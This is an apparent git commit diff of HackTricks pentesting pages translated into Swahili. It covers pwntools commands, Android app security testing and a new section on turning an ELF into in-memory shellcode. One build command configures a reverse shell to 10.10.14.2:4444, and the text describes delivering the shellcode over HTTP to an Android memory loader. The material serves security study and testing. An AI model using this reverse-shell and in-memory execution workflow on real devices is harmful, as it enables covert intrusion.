maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/mobile-pentesting/android-app-pentesting/README.md', 's

Browse Source
This commit is contained in:
Translator 2025-09-30 02:13:32 +00:00
parent ca3cb9c0e9
commit f2f39aaa1a
5 changed files with 496 additions and 330 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -353,6 +353,7 @@
- [Frida Tutorial 3](mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md)
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
- [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md)
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)

101
src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md
View File

@ -11,16 +11,16 @@ Pata **opcodes** kutoka kwa mstari au faili.
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**Inaweza kuchagua:**
**Unaweza kuchagua:**
- aina ya pato (raw, hex, string, elf)
- muktadha wa faili la pato (16, 32, 64, linux, windows...)
- epuka bytes (mistari mipya, null, orodha)
- chagua encoder debug shellcode ukitumia gdb endesha pato
- aina ya output (raw,hex,string,elf)
- muktadha wa faili za output (16,32,64,linux,windows...)
- epuka bytes (new lines, null, a list)
- chagua encoder, debug shellcode kwa kutumia gdb na endesha output
## **Pwn checksec**
Script ya checksec
Skripti ya Checksec
```
pwn checksec <executable>
```
@ -33,22 +33,22 @@ Pata muundo
pwn cyclic 3000
pwn cyclic -l faad
```
**Inaweza kuchaguliwa:**
**Inaweza kuchagua:**
- Alfabeti inayotumika (herufi ndogo kwa chaguo-msingi)
- Urefu wa muundo wa kipekee (chaguo-msingi 4)
- muktadha (16,32,64,linux,windows...)
- Chukua ofseti (-l)
- Alfabeta inayotumika (herufi ndogo kwa chaguo-msingi)
- Urefu wa uniq pattern (chaguo-msingi 4)
- context (16,32,64,linux,windows...)
- Chukua offset (-l)
## Pwn debug
Unganisha GDB na mchakato
Unganisha GDB kwenye mchakato
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**Inaweza kuchaguliwa:**
**Inaweza kuchagua:**
- Kwa executable, kwa jina au kwa muktadha wa pid (16,32,64,linux,windows...)
- gdbscript ya kutekeleza
@ -62,25 +62,25 @@ pwn disablenx <filepath>
```
## Pwn disasm
Disas hex opcodes
Changanua opcodes za hex
```
pwn disasm ffe4
```
**Inaweza kuchaguliwa:**
**Unaweza kuchagua:**
- muktadha (16,32,64,linux,windows...)
- anwani ya msingi
- rangi (default)/hakuna rangi
- context (16,32,64,linux,windows...)
- base addres
- color(default)/no color
## Pwn elfdiff
Chapisha tofauti kati ya faili 2
Onyesha tofauti kati ya faili 2
```
pwn elfdiff <file1> <file2>
```
## Pwn hex
Pata uwakilishi wa hexadecimal
Pata uwakilishi wa heksadesimali
```bash
pwn hex hola #Get hex of "hola" ascii
```
@ -90,11 +90,11 @@ Pata hexdump
```
pwn phd <file>
```
**Inaweza kuchaguliwa:**
**Inaweza kuchagua:**
- Idadi ya bytes za kuonyesha
- Idadi ya bytes kwa kila mstari wa kuangazia byte
- Kusaidia bytes mwanzoni
- Idadi ya bytes kwa kila mstari (byte ya kuangazia)
- Ruka bytes mwanzoni
## Pwn pwnstrip
@ -112,26 +112,26 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**Inaweza kuchaguliwa:**
- shellcode na hoja za shellcode
- Faili ya nje
- muundo wa pato
- debug (unganishisha dbg na shellcode)
- kabla (trap ya debug kabla ya msimbo)
- shellcode na vigezo kwa ajili ya shellcode
- Faili ya pato
- Umbizo la pato
- debug (ambatisha dbg kwa shellcode)
- kabla (debug trap kabla ya code)
- baada
- epuka kutumia opcodes (default: si null na mstari mpya)
- epuka kutumia opcodes (chaguo-msingi: not null and new line)
- Endesha shellcode
- Rangi/hana rangi
- Rangi/hauna rangi
- orodhesha syscalls
- orodhesha shellcodes zinazowezekana
- Tengeneza ELF kama maktaba ya pamoja
- Tengeneza ELF kama shared library
## Pwn template
Pata kiolezo cha python
Pata template ya python
```
pwn template
```
**Inaweza kuchagua:** mwenyeji, bandari, mtumiaji, pass, njia na kimya
**Inaweza kuchagua:** host, port, user, pass, path and quiet
## Pwn unhex
@ -139,10 +139,43 @@ Kutoka hex hadi string
```
pwn unhex 686f6c61
```
## Pwn update
## Sasisho la Pwn
Ili kusasisha pwntools
```
pwn update
```
## ELF → raw shellcode ufungashaji (loader_append)
Pwntools inaweza kubadilisha ELF huru kuwa blob moja la raw shellcode linalopanga mwenyewe sekimenti zake na kuhamisha execution kwa original entrypoint. Hii ni bora kwa memory-only loaders (mfano, Android apps zinazoita JNI kutekeleza downloaded bytes).
Mchakato wa kawaida (mfano amd64)
1) Jenga payload ELF imara, positionindependent (musl inashauriwa kwa uhamaji):
```bash
musl-gcc -O3 -s -static -o exploit exploit.c \
-DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
```
2) Geuza ELF → shellcode kwa pwntools:
```python
# exp2sc.py
from pwn import *
context.clear(arch='amd64')
elf = ELF('./exploit')
sc = asm(shellcraft.loader_append(elf.data, arch='amd64'))
open('sc','wb').write(sc)
print(f"ELF size={len(elf.data)} bytes, shellcode size={len(sc)} bytes")
```
3) Wasilisha sc kwa memory loader (mfano, via HTTP[S]) na uitekeleze ndani ya mchakato.
Vidokezo
- loader_append inaingiza programu asili ya ELF ndani ya shellcode na hutoa loader ndogo inayofanya mmaps kwa segments na kuruka kwenye entry.
- Kuwa wazi kuhusu usanifu kwa kutumia context.clear(arch=...). arm64 ni ya kawaida kwenye Android.
- Hakikisha code ya payload yako haitegemei nafasi (positionindependent) na usitegemeee dhana za ASLR/NX za mchakato.
## Marejeo
- [Pwntools](https://docs.pwntools.com/en/stable/)
- [CoRPhone ELF→shellcode pipeline used for Android in-memory execution](https://github.com/0xdevil/corphone)
{{#include ../../../banners/hacktricks-training.md}}

522
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -4,7 +4,7 @@
## Misingi ya Programu za Android
Inashauriwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **vipengele muhimu zaidi vinavyohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
Inapendekezwa sana kuanza kusoma ukurasa huu ili kujua kuhusu sehemu muhimu zaidi zinazohusiana na usalama wa Android na sehemu hatari zaidi katika programu ya Android:
{{#ref}}
@ -13,15 +13,15 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
Hii ni zana kuu unayohitaji kuunganishwa na kifaa cha Android (imeigwa au halisi).\
**ADB** inaruhusu kudhibiti vifaa kwa njia ya **USB** au kupitia **Network** kutoka kwa kompyuta. Kifaa hiki kinawezesha **kunakili** faili kwa pande zote, **kufunga** na **kuondoa** apps, **kuendesha** amri za shell, **kufanya backup** ya data, **kusoma** logs, miongoni mwa kazi nyingine.
Hii ndiyo zana kuu unayohitaji kuunganishwa na kifaa cha Android (kilichoiga au cha kimwili).\
**ADB** inaruhusu kudhibiti vifaa kwa kutumia **USB** au **mtandao** kutoka kwa kompyuta. Huduma hii inafanya iwezekane **kunakili** faili pande zote mbili, **kufunga** na **kuondoa** apps, **kuendesha** amri za shell, **kusaidia kuhifadhi nakala** za data, **kusoma** logi, miongoni mwa kazi nyingine.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili ujifunze jinsi ya kutumia adb.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili kujifunza jinsi ya kutumia adb.
## Smali
Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flags). Kisha, inaweza kuwa ya manufaa ku-decompile APK, kubadilisha msimbo na ku-recompile tena.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa muhimu kama **mbadala kwa vipimo kadhaa wakati wa dynamic analysis** zitakazowasilishwa. Kwa hiyo, **kumbuka daima uwezekano huu**.
Wakati mwingine inavutia **kubadilisha msimbo wa programu** ili kupata **taarifa zilizofichwa** (labda nywila zilizoobfuscated vizuri au flags). Kisha, inaweza kuwa ya kuvutia ku-decompile APK, kubadilisha msimbo na ku-recompile yake.\
[**Katika tutorial hii** unaweza **kujifunza jinsi ya ku-decompile APK, kubadilisha msimbo wa Smali na ku-recompile APK** kwa uwezo mpya](smali-changes.md). Hii inaweza kuwa muhimu sana kama **mbadala kwa vipimo vingi wakati wa dynamic analysis** vitakavyowasilishwa. Kwa hivyo, **kumbuka kila wakati uwezekano huu**.
## Mbinu nyingine za kuvutia
@ -29,8 +29,8 @@ Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kufikia **taari
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Chomoa APK kutoka kwenye kifaa:
- **Pakua APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Toa APK kutoka kwenye kifaa:
```bash
adb shell pm list packages
com.android.insecurebankv2
@ -49,7 +49,7 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
# after merging, you will need to align and sign the apk, personally, I like to use the uberapksigner
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Masomo ya Kesi & Udhaifu
## Mfano za Kesi & Udhaifu
{{#ref}}
@ -61,41 +61,41 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
## Uchambuzi wa Statiki
## Uchambuzi wa Static
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama Java code** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers tofauti zilizopo**](apk-decompilers.md).
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama msimbo wa Java** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers mbalimbali zinazopatikana**](apk-decompilers.md).
### Kutafuta Taarifa Zinazovutia
### Kutafuta Habari Zenye Kuvutia
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... hata tazama kwa ajili ya code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwa app).
Kwa kuangalia tu **strings** za APK unaweza kutafuta **nywila**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api keys**, **usimbaji**, **bluetooth uuids**, **tokens** na chochote kinachovutia... hata tafuta code execution **backdoors** au authentication backdoors (credentials za admin zilizowekwa ndani ya app).
**Firebase**
Lipa makini kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya exploit hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa tahadhari maalum kwa **Firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya kuiexploit hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
### Uelewa wa msingi wa application - Manifest.xml, strings.xml
### Ufahamu wa msingi wa programu - Manifest.xml, strings.xml
Uchunguzi wa faili za programu _Manifest.xml_ na **_strings.xml_** unaweza kufumbua udhaifu wa usalama. Faili hizi zinaweza kupatikana kwa kutumia decompilers au kwa kubadilisha extension ya faili APK kuwa .zip kisha kuizipua.
Ukaguzi wa faili za programu _Manifest.xml_ na _strings.xml_ unaweza kufunua udhaifu wa usalama. Faili hizi zinaweza kufikiwa kwa kutumia decompilers au kwa kubadilisha nyongeza ya faili ya APK kuwa .zip kisha kuizifungua.
**Udahifu** unaotambulika kutoka **Manifest.xml** ni pamoja na:
**Udhaifu** uliotambuliwa kutoka kwa **Manifest.xml** ni pamoja na:
- **Debuggable Applications**: Applications zilizowekwa kama debuggable (`debuggable="true"`) katika faili _Manifest.xml_ zina hatari kwa kuwa zinaruhusu connections ambazo zinaweza kusababisha exploit. Kwa ufahamu zaidi juu ya jinsi ya exploit debuggable applications, rejea tutorial juu ya kupata na ku-exploit debuggable applications kwenye kifaa.
- **Backup Settings**: `android:allowBackup="false"` inapaswa kuwekwa wazi kwa applications zinazosimamia taarifa nyeti ili kuzuia backups zisizoidhinishwa za data kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Mipangilio maalumu ya network security (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components zinazoweza kutumiwa vibaya. Uchambuzi zaidi wakati wa testing ya dynamic unaweza kufichua jinsi ya exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizofunuliwa zinaweza kuruhusu access au modification ya data bila idhini. Usanidi wa FileProviders pia unapaswa kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, hasa kuzingatia jinsi URL schemes zinavyosimamiwa kwa ajili ya input vulnerabilities.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo za Android zinazotumika, zikionyesha umuhimu wa kuto-support outdated, vulnerable Android versions kwa sababu za usalama.
- **Maombi yanayoweza kudebugiwa**: Maombi yaliyowekwa kama debuggable (`debuggable="true"`) katika _Manifest.xml_ yanaweka hatari kwa sababu yanaruhusu muunganisho ambao unaweza kusababisha exploit. Kwa kuelewa zaidi juu ya jinsi ya kuiexploit debuggable applications, rejea somo kuhusu kutafuta na kutumia debuggable applications kwenye kifaa.
- **Mipangilio ya Backup**: Sifa `android:allowBackup="false"` inapaswa kuwekwa wazi kwa maombi yanayoshughulikia taarifa nyeti ili kuzuia backups zisizoidhinishwa kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Usalama wa Mtandao**: Mipangilio ya kawaida ya usalama wa mtandao (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kutaja maelezo ya usalama kama certificate pins na mipangilio ya trafiki ya HTTP. Mfano ni kuruhusu trafiki ya HTTP kwa domini maalum.
- **Exported Activities na Services**: Kutambua activities na services zilizo exported katika manifest kunaweza kuonyesha vipengele vinavyoweza kutumika vibaya. Uchambuzi zaidi wakati wa mtihani wa dynamique unaweza kufichua jinsi ya kuiexploit vipengele hivi.
- **Content Providers na FileProviders**: Content providers zilizo wazi zinaweza kuruhusu upatikanaji au urekebishaji wa data bila idhini. Usanidi wa FileProviders pia unapaswa kuchunguzwa kwa umakini.
- **Broadcast Receivers na URL Schemes**: Vipengele hivi vinaweza kutumika kwa matumizi ya udanganyifu, kwa kutilia mkazo jinsi URL schemes zinavyosimamiwa kwa udhaifu wa input.
- **SDK Versions**: Sifa za `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikionyesha umuhimu wa kuto support version za zamani ambazo zinaweza kuwa zenye udhaifu kwa masuala ya usalama.
Kutoka kwenye faili **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer yanaweza kupatikana, ikisisitiza umuhimu wa kupitia kwa uangalifu rasilimali hizi.
Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya watengenezaji zinaweza kugunduliwa, ikisisitiza umuhimu wa mapitio ya kina ya rasilimali hizi.
### Tapjacking
**Tapjacking** ni shambulio ambapo **malicious application** inaanzishwa na kujipanga juu ya application ya mwathiriwa. Mara inapoficha kimaso app ya mwathiriwa, interface yake ya mtumiaji imeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, huku ikiendelea kupitisha interaction kwa app ya mwathiriwa.\
Kwa ufanisi, inamtia doa mtumiaji kujua kuwa kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
**Tapjacking** ni shambulio ambapo **application** **hasidi** inaanzishwa na **kujipanga juu ya application ya mwathiriwa**. Mara inapoificha app ya mwathiriwa, kiolesura chake kimeundwa kwa njia ambayo kinamdanganya mtumiaji kufanya mwingiliano nayo, wakati inapitisha mwingiliano huo kwa app ya mwathiriwa.\
Kwa ufanisi, inamficha mtumiaji kwamba kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
Find more information in:
Pata habari zaidi katika:
{{#ref}}
@ -104,9 +104,9 @@ tapjacking.md
### Task Hijacking
Activity yenye `launchMode` imewekwa `singleTask` bila `taskAffinity` yoyote imeelezwa kuwa inakabiliwa na task Hijacking. Hii inamaanisha, that application inaweza kusanikishwa na ikiwa itaanzishwa kabla ya application halisi inaweza hijack task ya application halisi (kwa hivyo mtumiaji ataingiliana na **malicious application** akidhani anatumia ile halisi).
Activity yenye **`launchMode`** imewekwa kuwa **`singleTask` bila `taskAffinity`** imefafanuliwa imeathirika kwa task Hijacking. Hii inamaanisha, kwamba application inaweza kusanikishwa na ikiwa itaendeshwa kabla ya application halisi inaweza **kuhijack task ya application halisi** (hivyo mtumiaji atakuwa anaingiliana na **application hasidi akidhani anatumia ile halisi**).
More info in:
Taarifa zaidi katika:
{{#ref}}
@ -115,67 +115,67 @@ android-task-hijacking.md
### Uhifadhi wa data usio salama
**Internal Storage**
Internal Storage
Kwenye Android, files zilizohifadhiwa kwenye internal storage zimedesignwa kupatikana pekee na app iliyozitengeneza. Kipimo hiki cha usalama kinafanywa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu files kushirikiwa kati ya applications tofauti. Modes hizi hazizuizi access kwa files hizo na applications nyingine, ikiwa ni pamoja na zile zinazoweza kuwa malicious.
Katika Android, faili zilizohifadhiwa katika uhifadhi wa ndani zimetengenezwa kuwa kufikika pekee na app iliyozitengeneza. Kipimo hiki cha usalama kinatekelezwa na mfumo wa uendeshaji wa Android na kwa kawaida kinatosheleza mahitaji ya usalama ya wengi wa maombi. Hata hivyo, watengenezaji wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu faili kushirikishwa kati ya maombi tofauti. Mode hizi hazizuii upatikanaji wa faili hizi na maombi mengine, ikijumuisha yale ambayo yanaweza kuwa na nia mbaya.
1. **Static Analysis:**
- **Hakikisha** kuwa matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Modes hizi **zinaweza kufunua** files kwa access isiyokusudiwa au isiyoidhinishwa.
2. **Dynamic Analysis:**
- **Thibitisha** permissions zilizo kwenye files zilizotengenezwa na app. Haswa, **angalia** kama kuna files zilizowekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **application yoyote** iliyosanikishwa kwenye kifaa, bila kujali asili au nia yake, kusoma au kubadilisha files hizi.
1. **Uchambuzi wa Static:**
- **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Mode hizi **zinaweza kufichua** faili kwa upatikanaji usiotarajiwa au usioidhinishwa.
2. **Uchambuzi wa Dynamic:**
- **Thibitisha** ruhusa zilizowekwa kwenye faili zilizotengenezwa na app. Hasa, **angalia** kama faili yoyote imewekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaweka uwezo kwa **app yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili yake au nia, kusoma au kubadilisha faili hizi.
**External Storage**
External Storage
Unaposhughulika na files kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
Wakati wa kushughulikia faili kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
1. **Accessibility**:
- Files kwenye external storage ni **globally readable and writable**. Hii inamaanisha application yoyote au mtumiaji anaweza kufikia files hizi.
2. **Security Concerns**:
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kutoweka taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na application yoyote, ikifanya isiwe na usalama wa kutosha.
3. **Handling Data from External Storage**:
- Daima **fanya input validation** kwa data inayopatikana kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwa chanzo kisichotegemewa.
- Kuingiza executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekeziwi.
- Ikiwa application yako lazima ichukue executable files kutoka external storage, hakikisha files hizi zinasainiwa na kuthibitishwa kwa cryptography kabla ya kuzindua kwa dynamically. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
1. **Upatikanaji**:
- Faili kwenye external storage ni **zinazosomeka na kuandikwa na wote**. Hii inamaanisha app yoyote au mtumiaji anaweza kufikia faili hizi.
2. **Mambo ya Usalama**:
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kuto hifadhi taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na app yoyote, ikifanya isiwe salama.
3. **Kuendesha Data kutoka External Storage**:
- Daima **fanya uthibitishaji wa input** juu ya data inayorekebishwa kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwa chanzo kisichotegemewa.
- Hifadhi ya executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekezwi.
- Ikiwa app yako lazima ipokee faili za executable kutoka external storage, hakikisha faili hizi zimesainiwa na kuthibitishwa kificho kabla ya kupakiwa kwa njia ya dynamic. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa app yako.
External storage inaweza kupatikana katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
External storage inaweza kufikiwa katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
> [!TIP]
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directory ambao unazuia access kutoka app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia malicious application kupata read au write access kwa files za app nyingine.
> Kuanzia na Android 4.4 (**API 17**), SD card ina muundo wa directories unaopunguza upatikanaji wa app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia application hasidi kupata upatikanaji wa kusoma au kuandika kwa faili za app nyingine.
**Taarifa nyeti zilizohifadhiwa kwa clear-text**
**Taarifa nyeti zilizohifadhiwa kwa maandishi wazi**
- **Shared preferences**: Android inaruhusu kila application kuweka kwa urahisi xml files katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Shared preferences**: Android inaruhusu kila application kuhifadhi kwa urahisi faili za xml katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandishi wazi katika folder hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi kwa urahisi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa maandishi wazi katika folder hiyo.
### Broken TLS
**Accept All Certificates**
Kwa sababu fulani wakati mwingine developers hukubali certificates zote hata kama kwa mfano hostname haifai na mistari ya code kama ifuatayo:
Kwa sababu fulani wakati mwingine watengenezaji wanakubali certificates zote hata kama kwa mfano hostname haifanani na mistari ya msimbo kama ifuatavyo:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
Njia nzuri ya kujaribu hili ni kujaribu kunasa trafiki kwa kutumia proxy kama Burp bila kuidhinisha Burp CA ndani ya kifaa. Pia, unaweza kuunda na Burp cheti kwa hostname tofauti na kukitumia.
### Broken Cryptography
### Kriptografia Iliyovunjika
**Mchakato duni wa Usimamizi wa Funguo**
**Mchakato duni wa usimamizi wa funguo**
Baadhi ya developers huhifadhi data nyeti kwenye local storage na kuizificha kwa key iliyowekwa/kutabirika ndani ya code. Hii haipaswi kufanywa kwani reverse engineering inaweza kumruhusu attacker kutoa taarifa za siri.
Baadhi ya watengenezaji huhifadhi data nyeti kwenye local storage na kuiencrypt kwa kutumia funguo zilizowekwa moja kwa moja / predictable katika code. Hii haipaswi kufanywa kwani reversing inaweza kumruhusu mshambuliaji kutoa taarifa za siri.
**Matumizi ya Algorithms Yasiyo Salama na/au Zilizokataliwa**
**Matumizi ya Algorithimu Hatari na/au Zilizopitwa na Wakati**
Developers hawapaswi kutumia **deprecated algorithms** kufanya ukaguzi wa **authorisation checks**, **kuhifadhi** au **kutuma** data. Baadhi ya algorithms ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zimetumika kuhifadhi nywila kwa mfano, inapaswa kutumika hashes ambazo zinastahimili brute-force kwa kutumia salt.
Watengenezaji hawapaswi kutumia **deprecated algorithms** kufanya authorisation **checks**, **store** au **send** data. Baadhi ya algorithms hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi passwords kwa mfano, inapaswa kutumiwa hashes ambazo zina upinzani dhidi ya brute-force pamoja na salt.
### Other checks
### Mambo mengine ya kuangalia
- It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
- If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
- If the app is sensitive (like bank apps), it should check if an **emulator** is being used.
- If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified.
- Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK
- Inapendekezwa **obfuscate the APK** ili kufanya kazi ya reverse engineer kuwa ngumu kwa mashambuliaji.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kufanya check zake mwenyewe kuona kama mobile ime-rooted na kuchukua hatua ipasavyo.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kuhakiki kama emulator inatumika.
- Ikiwa app ni nyeti (kama bank apps), inapaswa **check it's own integrity before executing** ili kuona kama ilibadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuona compiler/packer/obfuscator gani ilitumika kujenga APK
### React Native Application
@ -197,17 +197,17 @@ Read the following page to learn how to easily access C# code of a xamarin appli
### Superpacked Applications
According to this [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked is a Meta algorithm that compress the content of an application into a single file. The blog talks about the possibility of creating an app that decompress these kind of apps... and a faster way which involves to **execute the application and gather the decompressed files from the filesystem.**
Kulingana na hii [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni Meta algorithm inayobana (compress) yaliyomo ya application ndani ya faili moja. Blog inaelezea uwezekano wa kuunda app inayoweza decompress aina hizi za apps... na njia ya haraka zaidi inayohusisha **execute the application and gather the decompressed files from the filesystem.**
### Automated Static Code Analysis
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) ina uwezo wa kupatikana **vulnerabilities** kwa **scanning** ya **code** ya application. Zana hii ina safu ya **known sources** (zinazorambia zana maeneo ambapo **input** inadhibitiwa na user), **sinks** (zinazorambia zana maeneo hatari ambapo input ya mtumiaji mbaya inaweza kusababisha uharibifu) na **rules**. Rules hizi zinaonyesha **mchanganyiko** wa **sources-sinks** unaoashiria udiwani wa usalama.
With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
Kwa uelewa huu, **mariana-trench itapitia code na kupata vulnerabilities zinazowezekana ndani yake**.
### Secrets leaked
An application may contain secrets (API keys, passwords, hidden urls, subdomains...) inside of it that you might be able to discover. You could us a tool such as [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
